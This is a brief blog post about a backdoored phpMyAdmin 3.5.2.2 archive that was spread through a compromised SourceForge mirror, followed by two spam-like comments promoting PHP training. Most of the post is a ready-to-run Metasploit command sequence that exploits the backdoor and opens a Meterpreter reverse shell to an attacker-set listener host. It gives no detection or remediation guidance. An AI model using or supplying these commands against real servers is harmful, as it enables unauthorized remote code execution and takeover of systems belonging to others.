Pages

Thursday, September 27, 2012

phpMyAdmin 3.5.2.2 server_sync.php Backdoor


One of the SourceForge.net mirrors, namely cdnetworks-kr-1, was being used to distribute a modified archive of phpMyAdmin, which includes a backdoor. This backdoor is located in file server_sync.php and allows an attacker to remotely execute PHP code. Another file, js/cross_framing_protection.js, has also been modified.


exploit for msf:  http://packetstormsecurity.org/files/116878/phpMyAdmin-3.5.2.2-server_sync.php-Backdoor.html

commands: use exploit/multi/http/phpmyadmin_3522_backdoor
                    set RHOST 192.168.178.40
                    set PATH /phpMyAdmin-3.5.2.2-all-languages
                    set PAYLOAD php/meterpreter/reverse_tcp
                    set LHOST 192.168.178.33
                    exploit


2 comments:

  1. This technical post helps me to improve my skills set, thanks for this wonder article I expect your upcoming blog, so keep sharing..
    Regards,
    php training institute

    ReplyDelete
  2. Hello Admin, thank you for enlightening us with your knowledge sharing. PHP has become an inevitable part of web development, and with proper PHP training institute in Chennai, one can have a strong career in the web development field.

    ReplyDelete